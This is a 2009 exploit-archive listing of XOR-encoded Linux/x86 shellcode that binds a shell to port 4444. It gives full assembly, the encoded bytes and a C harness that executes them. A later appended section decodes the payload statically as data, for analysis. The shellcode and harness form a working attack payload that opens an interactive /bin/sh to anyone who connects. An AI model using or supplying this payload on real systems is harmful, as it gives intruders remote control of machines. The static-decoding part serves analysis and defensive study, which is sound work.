Linux/x86 Port Binding Shellcode (xor-encoded) 152 bytes
Source: rick2600@hotmail.com  Author: Rick  Published: 2009-07-13

/*
       Author: Rick
       Email: rick2600@hotmail.com

       OS: Linux/x86
       Description: Port Bind 4444 ( xor-encoded )


--------------------------------------------------------------------
section .text
    global _start

_start:

    ;socket (PF_INET, SOCK_STREAM, 0)
    push byte 0x66     
    pop eax
    push byte 0x01
    pop ebx
    xor ecx, ecx
    push ecx
    push byte 0x01
    push byte 0x02
    mov ecx, esp
    int 0x80
   
    mov esi, eax ;save file descriptor
   
    ;bind (sockfd, server, len)
    xor edx, edx
    push edx
    push word 0x5c11
    push word 0x02
    mov ecx, esp
    push byte 0x10
    push ecx
    push eax
    mov ecx, esp
    mov bl, 0x02
    push byte 0x66
    pop eax
    int 0x80
   
    ;listen
    mov al, 0x66
    mov bl, 0x04
    int 0x80
   
    ;accept
    push edx
    push esi
    mov ecx, esp
    inc ebx
    push byte 0x66
    pop eax
    int 0x80
   
    mov ebx, eax ;save file descriptor
   
    ;dup2(sockfd, 2); dup2(sockfd, 1); dup2(sockfd, 0)
    push byte 0x02
    pop ecx
    do_dup:
        push byte 0x3f
        pop eax
        int 0x80
    loop do_dup
        push byte 0x3f
        pop eax
        int 0x80
   
   
    ; execve ("/bin/sh", ["/bin/sh", "-i"], 0);
    xor edx, edx
    push edx
    push 0x68732f6e
    push 0x69622f2f
    mov ebx, esp
    push edx
    push word 0x692d
    mov ecx, esp
    push edx
    push ecx
    push ebx
    mov ecx, esp
    push byte 0x0b
    pop eax
    int 0x80
   
    ;exit(0)
    push byte 0x01
    pop eax
    xor ebx, ebx
    int 0x80
--------------------------------------------------------------------
*/
                       
#include <stdio.h>
#include <string.h>

 

char code[] =
"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34"
"\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
"\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f"
"\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
"\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f"
"\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
"\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e"
"\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
"\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c"
"\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
"\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d"
"\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
"\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff"
"\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
"\xd3\x9e";

 

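int main(void)
{
   /* strlen() returns size_t, so print it with %zu */
   printf("length: %zu\n", strlen(code));

   /* treat the byte array as a function and jump to it */
   void (*shellcode)();
   shellcode = (void *)code;
   shellcode();
   return (0);
}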
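For analysts, an added example (not part of the original listing) that treats `code[]` purely as data: it reads the XOR key and byte count out of the 25-byte jmp/call/pop decoder stub, decodes the payload statically, and recovers the bind port from the `push word` pair in the listing. The function names and the fixed stub offsets are assumptions derived from the bytes shown above.

```c
#include <stdio.h>
#include <string.h>

/* Bytes of the page's code[] array, handled strictly as data (never executed). */
static const unsigned char sample[] =
    "\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" "\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05"
    "\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" "\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff"
    "\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" "\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f"
    "\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" "\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff"
    "\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" "\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21"
    "\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" "\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78"
    "\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" "\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5"
    "\xd3\x9e";

#define STUB_LEN 25 /* length of the jmp/call/pop XOR decoder stub */

/* Undo the stub's XOR loop without running it: the count is the imm8 of
 * "mov cl" (offset 6), the key the imm8 of "xor al" (offset 10).
 * Returns the payload length, or -1 if buf does not have this stub layout. */
int xor_stub_decode(const unsigned char *buf, size_t len, unsigned char *out, size_t cap)
{
    if (len < STUB_LEN || buf[0] != 0xeb || buf[2] != 0x5b ||
        buf[5] != 0xb1 || buf[9] != 0x34 || buf[20] != 0xe8)
        return -1;
    size_t n = buf[6];
    if (n > len - STUB_LEN || n > cap)
        return -1;
    for (size_t i = 0; i < n; i++)
        out[i] = buf[STUB_LEN + i] ^ buf[10];
    return (int)n;
}

/* Locate "push word <port>; push word 2" (66 68 pp pp 66 68 02 00), the
 * sockaddr_in setup before bind in the listing; returns the port or -1. */
int bind_port(const unsigned char *p, int n)
{
    for (int i = 0; i + 8 <= n; i++)
        if (p[i] == 0x66 && p[i + 1] == 0x68 && !memcmp(p + i + 4, "\x66\x68\x02\x00", 4))
            return (p[i + 2] << 8) | p[i + 3];
    return -1;
}

int main(void)
{
    unsigned char dec[256];
    int n = xor_stub_decode(sample, sizeof sample - 1, dec, sizeof dec);
    printf("key=0x%02x payload=%d port=%d\n", sample[10], n, n < 0 ? -1 : bind_port(dec, n));
    return n < 0;
}
```

The decoded bytes begin `6a 66 58`, matching the `push byte 0x66` / `pop eax` that opens the assembly listing, so the static decode can be checked against the source without ever mapping the buffer executable.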


 